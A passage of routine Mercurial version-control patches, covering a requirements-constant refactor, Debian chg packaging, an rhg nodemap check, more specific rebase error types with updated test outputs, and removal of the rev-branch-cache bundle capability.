requirements.discard(b'generaldelta') + requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT) requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) # experimental config: format.internal-phase if ui.configbool(b'format', b'internal-phase'): diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -7,6 +7,8 @@ from __future__ import absolute_import +GENERALDELTA_REQUIREMENT = b'generaldelta' + # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. NARROW_REQUIREMENT = b'narrowhg-experimental' diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -20,7 +20,7 @@ # list of requirements that request a clone of all revlog if added/removed RECLONES_REQUIREMENTS = { - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, } @@ -236,7 +236,7 @@ class generaldelta(requirementformatvariant): name = b'generaldelta' - _requirement = b'generaldelta' + _requirement = requirements.GENERALDELTA_REQUIREMENT default = True @@ -936,7 +936,7 @@ supported = { b'dotencode', b'fncache', - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, b'store', requirements.SPARSEREVLOG_REQUIREMENT, @@ -967,7 +967,7 @@ supported = { b'dotencode', b'fncache', - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -109,7 +109,7 @@ 4. server.bundle1 """ ui = repo.ui - gd = b'generaldelta' in repo.requirements + gd = requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements if gd: v = ui.configbool(b'server', b'bundle1gd.%s' % action) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614814278 -3600 # Thu Mar 04 00:31:18 2021 +0100 # Node ID 0a23ace80e5489563796222cd2b7ac1278e3850f # Parent f4c325bf80fc4c7cd12d65f0489ea8f80e9db54c relnotes: document a number of node->revision type changes Differential Revision: https://phab.mercurial-scm.org/D10103 diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -26,3 +26,8 @@ * `changelog.branchinfo` is deprecated and will be removed after 5.8. It is superseded by `changelogrevision.branchinfo`. + + * Callbacks for revlog.addgroup and the changelog._nodeduplicatecallback hook + now get a revision number as argument instead of a node. + + * revlog.addrevision returns the revision number instead of the node. # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1612488860 28800 # Thu Feb 04 17:34:20 2021 -0800 # Node ID 90481550467ca8d117678bf26cfc359a5b6e636a # Parent 0a23ace80e5489563796222cd2b7ac1278e3850f debian: support a "chg-first" installation mechanism (hg is actually chg) This mechanism builds chg such that it looks for `hg` to be available at /usr/lib/mercurial/hg instead of in the $PATH as `hg`, and makes the `hg` in /usr/bin be a symlink to `chg`. It's important to note that the hg binary must continue to be named `hg`. If we wanted to instead place it at /usr/bin/pyhg or something similar, we would need to modify Mercurial to allow that basename. Failure to do so would break Mercurial's shell aliases that use `hg`, `chg`, or `$HG`. I don't know if we should ever have a setup like this be the default setup, but I'm willing to get more information on our experience with it for making such a determination. Actually making it the default might be rather involved, as we don't maintain the official debian packaging rules. Differential Revision: https://phab.mercurial-scm.org/D10020 diff --git a/contrib/packaging/debian/rules b/contrib/packaging/debian/rules --- a/contrib/packaging/debian/rules +++ b/contrib/packaging/debian/rules @@ -18,6 +18,10 @@ # DEB_HG_PYTHON_VERSIONS="3.7 3.8" make deb DEB_HG_MULTI_VERSION?=0 +# Set to 1 to make /usr/bin/hg a symlink to chg, and move hg to +# /usr/lib/mercurial/hg. +DEB_HG_CHG_BY_DEFAULT?=0 + CPUS=$(shell cat /proc/cpuinfo | grep -E ^processor | wc -l) # By default, only build for the version of python3 that the system considers @@ -40,6 +44,12 @@ DEB_HG_PYTHON_VERSIONS?=$(shell py3versions -vd) endif +ifeq ($(DEB_HG_CHG_BY_DEFAULT), 1) + # Important: the "real" hg must have a 'basename' of 'hg'. Otherwise, hg + # behaves differently when setting $HG and breaks aliases that use that. + export HGPATH=/usr/lib/mercurial/hg +endif + export HGPYTHON3=1 export PYTHON=python3 @@ -86,3 +96,8 @@ cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg + if [[ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]]; then \ + mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \ + mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \ + ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \ + fi # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614284952 -3600 # Thu Feb 25 21:29:12 2021 +0100 # Node ID 842f2372ced607f2c9292fcff88e3c8c16ed0da1 # Parent 90481550467ca8d117678bf26cfc359a5b6e636a rhg: Don’t attempt to read persistent nodemap without .hg/requires opt-in Differential Revision: https://phab.mercurial-scm.org/D10077 diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,4 +1,5 @@ use crate::errors::{HgError, HgResultExt}; +use crate::requirements; use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; use std::path::{Path, PathBuf}; @@ -38,6 +39,14 @@ repo: &Repo, index_path: &Path, ) -> Result<Option<(Self, Mmap)>, RevlogError> { + if !repo + .requirements() + .contains(requirements::NODEMAP_REQUIREMENT) + { + // If .hg/requires does not opt it, don’t try to open a nodemap + return Ok(None); + } + let docket_path = index_path.with_extension("n"); let docket_bytes = if let Some(bytes) = repo.store_vfs().read(&docket_path).io_not_found_as_none()? @@ -88,6 +97,8 @@ Err(HgError::corrupted("persistent nodemap too short").into()) } } else { + // Even if .hg/requires opted in, some revlogs are deemed small + // enough to not need a persistent nodemap. Ok(None) } } # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614614091 -3600 # Mon Mar 01 16:54:51 2021 +0100 # Node ID 230f73019e49a0056c1863184c25932203ac8523 # Parent 842f2372ced607f2c9292fcff88e3c8c16ed0da1 changelog: rename parameters to reflect semantics `read` and `readfiles` can be used with a revision just as well, so follow the naming convention in revlog to reflect this. Differential Revision: https://phab.mercurial-scm.org/D10081 diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -507,7 +507,7 @@ if not self._delayed: revlog.revlog._enforceinlinesize(self, tr, fp) - def read(self, node): + def read(self, nodeorrev): """Obtain data from a parsed changelog revision. Returns a 6-tuple of: @@ -523,7 +523,7 @@ ``changelogrevision`` instead, as it is faster for partial object access. """ - d, s = self._revisiondata(node) + d, s = self._revisiondata(nodeorrev) c = changelogrevision( d, s, self._copiesstorage == b'changeset-sidedata' ) @@ -536,11 +536,11 @@ text, sidedata, self._copiesstorage == b'changeset-sidedata' ) - def readfiles(self, node): + def readfiles(self, nodeorrev): """ short version of read that only returns the files modified by the cset """ - text = self.revision(node) + text = self.revision(nodeorrev) if not text: return [] last = text.index(b"\n\n") # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611966792 28800 # Fri Jan 29 16:33:12 2021 -0800 # Node ID 9989a276712fe845513461aceb44073a68bc4c49 # Parent 230f73019e49a0056c1863184c25932203ac8523 errors: use more specific errors in rebase extension Differential Revision: https://phab.mercurial-scm.org/D9914 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -144,7 +144,7 @@ return smartset.baseset() dests = destutil.orphanpossibledestination(repo, src) if len(dests) > 1: - raise error.Abort( + raise error.StateError( _(b"ambiguous automatic rebase: %r could end up on any of %r") % (src, dests) ) @@ -424,7 +424,7 @@ if self.collapsef: dests = set(self.destmap.values()) if len(dests) != 1: - raise error.Abort( + raise error.InputError( _(b'--collapse does not work with multiple destinations') ) destrev = next(iter(dests)) @@ -469,7 +469,7 @@ for rev in self.state: branches.add(repo[rev].branch()) if len(branches) > 1: - raise error.Abort( + raise error.InputError( _(b'cannot collapse multiple named branches') ) @@ -1093,10 +1093,10 @@ with repo.wlock(), repo.lock(): rbsrt.restorestatus() if rbsrt.collapsef: - raise error.Abort(_(b"cannot stop in --collapse session")) + raise error.StateError(_(b"cannot stop in --collapse session")) allowunstable = obsolete.isenabled(repo, obsolete.allowunstableopt) if not (rbsrt.keepf or allowunstable): - raise error.Abort( + raise error.StateError( _( b"cannot remove original changesets with" b" unrebased descendants" @@ -1220,14 +1220,16 @@ ) % help ) - raise error.Abort(msg) + raise error.InputError(msg) if rbsrt.collapsemsg and not rbsrt.collapsef: - raise error.Abort(_(b'message can only be specified with collapse')) + raise error.InputError( + _(b'message can only be specified with collapse') + ) if action: if rbsrt.collapsef: - raise error.Abort( + raise error.InputError( _(b'cannot use collapse with continue or abort') ) if action == b'abort' and opts.get(b'tool', False): @@ -1294,7 +1296,7 @@ cmdutil.bailifchanged(repo) if ui.configbool(b'commands', b'rebase.requiredest') and not destf: - raise error.Abort( + raise error.InputError( _(b'you must specify a destination'), hint=_(b'use: hg rebase -d REV'), ) @@ -1388,7 +1390,7 @@ return None if wdirrev in rebaseset: - raise error.Abort(_(b'cannot rebase the working copy')) + raise error.InputError(_(b'cannot rebase the working copy')) rebasingwcp = repo[b'.'].rev() in rebaseset ui.log( b"rebase", @@ -1426,7 +1428,7 @@ elif size == 0: ui.note(_(b'skipping %s - empty destination\n') % repo[r]) else: - raise error.Abort( + raise error.InputError( _(b'rebase destination for %s is not unique') % repo[r] ) @@ -1459,7 +1461,7 @@ return nullrev if len(parents) == 1: return parents.pop() - raise error.Abort( + raise error.StateError( _( b'unable to collapse on top of %d, there is more ' b'than one external parent: %s' @@ -1659,7 +1661,7 @@ b"to force the rebase please set " b"experimental.evolution.allowdivergence=True" ) - raise error.Abort(msg % (b",".join(divhashes),), hint=h) + raise error.StateError(msg % (b",".join(divhashes),), hint=h) def successorrevs(unfi, rev): @@ -1762,7 +1764,7 @@ # /| # None of A and B will be changed to D and rebase fails. # A B D if set(newps) == set(oldps) and dest not in newps: - raise error.Abort( + raise error.InputError( _( b'cannot rebase %d:%s without ' b'moving at least one of its parents' @@ -1774,7 +1776,7 @@ # impossible. With multi-dest, the initial check does not cover complex # cases since we don't have abstractions to dry-run rebase cheaply. if any(p != nullrev and isancestor(rev, p) for p in newps): - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) # Check if the merge will contain unwanted changes. That may happen if # there are multiple special (non-changelog ancestor) merge bases, which @@ -1836,7 +1838,7 @@ if revs is not None ) ) - raise error.Abort( + raise error.InputError( _(b'rebasing %d:%s will include unwanted changes from %s') % (rev, repo[rev], unwanteddesc) ) @@ -1981,7 +1983,7 @@ if destmap[r] not in srcset: result.append(r) if not result: - raise error.Abort(_(b'source and destination form a cycle')) + raise error.InputError(_(b'source and destination form a cycle')) srcset -= set(result) yield result @@ -2001,12 +2003,12 @@ if b'qtip' in repo.tags(): mqapplied = {repo[s.node].rev() for s in repo.mq.applied} if set(destmap.values()) & mqapplied: - raise error.Abort(_(b'cannot rebase onto an applied mq patch')) + raise error.StateError(_(b'cannot rebase onto an applied mq patch')) # Get "cycle" error early by exhausting the generator. sortedsrc = list(sortsource(destmap)) # a list of sorted revs if not sortedsrc: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) # Only check the first batch of revisions to rebase not depending on other # rebaseset. This means "source is ancestor of destination" for the second @@ -2014,7 +2016,7 @@ # "defineparents" to do that check. roots = list(repo.set(b'roots(%ld)', sortedsrc[0])) if not roots: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) def revof(r): return r.rev() @@ -2026,7 +2028,7 @@ dest = repo[destmap[root.rev()]] commonbase = root.ancestor(dest) if commonbase == root: - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) if commonbase == dest: wctx = repo[None] if dest == wctx.p1(): @@ -2119,7 +2121,7 @@ if ui.configbool(b'commands', b'rebase.requiredest'): msg = _(b'rebase destination required by configuration') hint = _(b'use hg pull followed by hg rebase -d DEST') - raise error.Abort(msg, hint=hint) + raise error.InputError(msg, hint=hint) with repo.wlock(), repo.lock(): if opts.get('update'): @@ -2176,7 +2178,7 @@ commands.update(ui, repo) else: if opts.get('tool'): - raise error.Abort(_(b'--tool can only be used with --rebase')) + raise error.InputError(_(b'--tool can only be used with --rebase')) ret = orig(ui, repo, *args, **opts) return ret diff --git a/tests/test-rebase-collapse.t b/tests/test-rebase-collapse.t --- a/tests/test-rebase-collapse.t +++ b/tests/test-rebase-collapse.t @@ -134,7 +134,7 @@ $ hg rebase --base B -m 'custom message' abort: message can only be specified with collapse - [255] + [10] $ cat > $TESTTMP/checkeditform.sh <<EOF > env | grep HGEDITFORM @@ -180,7 +180,7 @@ $ hg rebase -s C --dest H --collapse abort: unable to collapse on top of 3, there is more than one external parent: 1, 6 - [255] + [20] Rebase and collapse - E onto H: @@ -386,7 +386,7 @@ BROKEN: should be allowed $ hg rebase --collapse -r 'B+D+F' -d G abort: unable to collapse on top of 2, there is more than one external parent: 3, 5 - [255] + [20] $ cd .. @@ -404,7 +404,7 @@ $ hg rebase --collapse -d H -s 'B+F' abort: unable to collapse on top of 5, there is more than one external parent: 1, 3 - [255] + [20] $ cd .. With internal merge: @@ -484,7 +484,7 @@ $ hg rebase --keepbranches --collapse -s 1 -d 3 abort: cannot collapse multiple named branches - [255] + [10] $ cd .. diff --git a/tests/test-rebase-dest.t b/tests/test-rebase-dest.t --- a/tests/test-rebase-dest.t +++ b/tests/test-rebase-dest.t @@ -18,7 +18,7 @@ $ hg rebase abort: you must specify a destination (use: hg rebase -d REV) - [255] + [10] $ hg rebase -d 1 rebasing 2:5db65b93a12b tip "cc" saved backup bundle to $TESTTMP/repo/.hg/strip-backup/5db65b93a12b-4fb789ec-rebase.hg @@ -74,7 +74,7 @@ $ hg pull --rebase abort: rebase destination required by configuration (use hg pull followed by hg rebase -d DEST) - [255] + [10] Setup rebase with multiple destinations @@ -152,7 +152,7 @@ > A D > EOS abort: --collapse does not work with multiple destinations - [255] + [10] Multiple destinations cannot be used with --base: @@ -192,7 +192,7 @@ > Z > EOS abort: rebase destination for f0a671a46792 is not unique - [255] + [10] Destination is an ancestor of source: @@ -204,7 +204,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] BUG: cycles aren't flagged correctly when --dry-run is set: $ rebasewithdag -s B -d 'SRC' --dry-run <<'EOS' @@ -216,7 +216,7 @@ > EOS abort: source and destination form a cycle starting dry-run rebase; repository will not be changed - [255] + [10] Switch roots: @@ -329,7 +329,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] Detect source is ancestor of dest in runtime: @@ -341,7 +341,7 @@ > A > EOS abort: source is ancestor of destination - [255] + [10] "Already rebased" fast path still works: diff --git a/tests/test-rebase-mq.t b/tests/test-rebase-mq.t --- a/tests/test-rebase-mq.t +++ b/tests/test-rebase-mq.t @@ -46,14 +46,14 @@ $ hg rebase -s 1 -d 3 abort: cannot rebase onto an applied mq patch - [255] + [20] Rebase - same thing, but mq patch is default dest: $ hg up -q 1 $ hg rebase abort: cannot rebase onto an applied mq patch - [255] + [20] $ hg up -q qtip Rebase - generate a conflict: diff --git a/tests/test-rebase-named-branches.t b/tests/test-rebase-named-branches.t --- a/tests/test-rebase-named-branches.t +++ b/tests/test-rebase-named-branches.t @@ -247,7 +247,7 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] $ hg rebase -s 6 -d 5 rebasing 6:3944801ae4ea "dev-two named branch" diff --git a/tests/test-rebase-newancestor.t b/tests/test-rebase-newancestor.t --- a/tests/test-rebase-newancestor.t +++ b/tests/test-rebase-newancestor.t @@ -154,7 +154,7 @@ rebasing 2:ec2c14fb2984 "dev: f-dev stuff" rebasing 4:4b019212aaf6 "dev: merge default" abort: rebasing 4:4b019212aaf6 will include unwanted changes from 1:1d1a643d390e - [255] + [10] $ cd .. @@ -314,7 +314,7 @@ rebasing 6:b296604d9846 E "E" rebasing 7:caa9781e507d F tip "F" abort: rebasing 7:caa9781e507d will include unwanted changes from 4:d6003a550c2c or 3:c1e6b162678d - [255] + [10] The warning does not get printed if there is no unwanted change detected: diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -560,7 +560,7 @@ rebasing 2:b18e25de2cf5 D "D" rebasing 6:f15c3adaf214 F tip "F" abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] + [10] $ cd .. @@ -948,7 +948,7 @@ $ hg rebase -s 10 -d 12 abort: this rebase will cause divergences from: 121d9e3bc4c6 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg log -G @ 14:73568ab6879d bar foo | @@ -1152,7 +1152,7 @@ $ hg rebase -r 'c'::'f' -d 'x' abort: this rebase will cause divergences from: 76be324c128b (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' rebasing 3:a82ac2b38757 c "c" rebasing 4:76be324c128b d "d" @@ -1566,7 +1566,7 @@ $ hg rebase -b 'desc("D")' -d 'desc("J")' abort: this rebase will cause divergences from: 112478962961 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] Rebase merge where both parents have successors in destination @@ -1585,7 +1585,7 @@ note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" rebasing 7:dac5d11c5a7d E tip "E" abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] + [10] $ cd .. Rebase a non-clean merge. One parent has successor in destination, the other @@ -1941,7 +1941,7 @@ $ hg rebase --stop abort: cannot remove original changesets with unrebased descendants (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] + [20] $ hg rebase --abort saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg rebase aborted @@ -2020,7 +2020,7 @@ [240] $ hg rebase --stop abort: cannot stop in --collapse session - [255] + [20] $ hg rebase --abort rebase aborted $ hg diff diff --git a/tests/test-rebase-parameters.t b/tests/test-rebase-parameters.t --- a/tests/test-rebase-parameters.t +++ b/tests/test-rebase-parameters.t @@ -66,7 +66,7 @@ $ hg rebase --continue --collapse abort: cannot use collapse with continue or abort - [255] + [10] $ hg rebase --continue --dest 4 abort: cannot specify both --continue and --dest @@ -94,15 +94,15 @@ $ hg rebase --rev 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 1 --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source '1 & !1' --dest 8 empty "source" revision set - nothing to rebase @@ -508,11 +508,11 @@ $ hg rebase -i abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ hg rebase --interactive abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ cd .. diff --git a/tests/test-rebase-scenario-global.t b/tests/test-rebase-scenario-global.t --- a/tests/test-rebase-scenario-global.t +++ b/tests/test-rebase-scenario-global.t @@ -266,14 +266,14 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] G onto B - merge revision with both parents not in ancestors of target: $ hg rebase -s 6 -d 1 rebasing 6:eea13746799a "G" abort: cannot rebase 6:eea13746799a without moving at least one of its parents - [255] + [10] $ hg rebase --abort rebase aborted # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614891535 -3600 # Thu Mar 04 21:58:55 2021 +0100 # Node ID 7015b0232c5ea9666e621f7051a744d07a24f7b9 # Parent 9989a276712fe845513461aceb44073a68bc4c49 exchange: stop advertising rev-branch-cache bundle capability Since Mercurial 5.7, the corresponding bundle part is ignored as redundant. Stop advertising it so that peers don't have to spend time creating or transfering it. Differential Revision: https://phab.mercurial-scm.org/D10114 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -1598,7 +1598,6 @@ b'digests': tuple(sorted(util.DIGESTS.keys())), b'remote-changegroup': (b'http', b'https'), b'hgtagsfnodes': (), - b'rev-branch-cache': (), b'phases': (b'heads',), b'stream': (b'v2',), } @@ -1643,6 +1642,9 @@ # Else always advertise support on client, because payload support # should always be advertised. + # b'rev-branch-cache is no longer advertised, but still supported + # for legacy clients. + return caps diff --git a/tests/common-pattern.py b/tests/common-pattern.py --- a/tests/common-pattern.py +++ b/tests/common-pattern.py @@ -20,7 +20,6 @@ br'phases%253Dheads%250A' br'pushkey%250A' br'remote-changegroup%253Dhttp%252Chttps%250A' - br'rev-branch-cache%250A' br'stream%253Dv2', # (the replacement patterns) br'$USUAL_BUNDLE_CAPS$', @@ -53,7 +52,6 @@ br'phases%3Dheads%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS$', @@ -70,8 +68,7 @@ br'listkeys%0A' br'phases%3Dheads%0A' br'pushkey%0A' - br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache', + br'remote-changegroup%3Dhttp%2Chttps', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_SERVER$', ), @@ -85,7 +82,6 @@ br'listkeys%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_NO_PHASES$', diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -109,14 +109,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -175,14 +175,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -245,14 +245,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -325,14 +325,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -395,14 +395,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -470,14 +470,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -542,14 +542,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -619,14 +619,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -693,14 +693,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -766,7 +766,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -775,7 +775,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 